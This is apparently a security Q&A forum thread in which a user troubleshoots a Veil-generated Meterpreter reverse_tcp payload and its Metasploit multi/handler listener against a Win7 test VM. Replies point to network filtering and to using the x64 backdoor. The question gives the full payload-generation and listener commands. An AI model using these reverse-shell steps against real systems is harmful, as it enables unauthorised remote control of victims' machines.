3

This is how I am generating the payload in Veil 3

> use XX
> set LHOST X.X.X.X
> set LPORT 3333
> generate

The payload generates successfully and transferred to victim machine Win7 SP1 VM running no antivirus of any sort. While on metasploit end

> msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST X.X.X.X
> set LPORT 3333
> set ExitOnSession false 
> exploit

X.X.X.X is a public IP. While running this I get stuck to following and nothing happens

[*] Started reverse TCP handler on X.X.X.X:3333

Where am I going wrong. What could be the issue here. I have allowed port 3333 in ufw and no other services are listening to that port. Also after running the payload on victim machine and doing netstat gives me no instance of port 3333 communicating to X.X.X.X.

schroeder
  • 123,438
  • 55
  • 284
  • 319
Youbecks003
  • 175
  • 8
  • Veil is pretty good but there can be quite a few reasons the connection could fail. You removed AV as a problem from the local host but need to consider the end to end network path. Are you at work where there might be a NIPS in place? I s there any sort of firewall or cloud based anti-virus between you and the destination target? Any of these network based controls can also prevent you from establishing a connection successfully. – Joe Dec 27 '18 at 02:43

1 Answers1

0

I've had this problem before, and my issue was that the veil payload was a 32bit version of the generated backdoor. I had to use the x64 version of the backdoor. If you don't have the 64 bit version of the payload, you'll need to update your veil and try again.

standarduser
  • 113
  • 3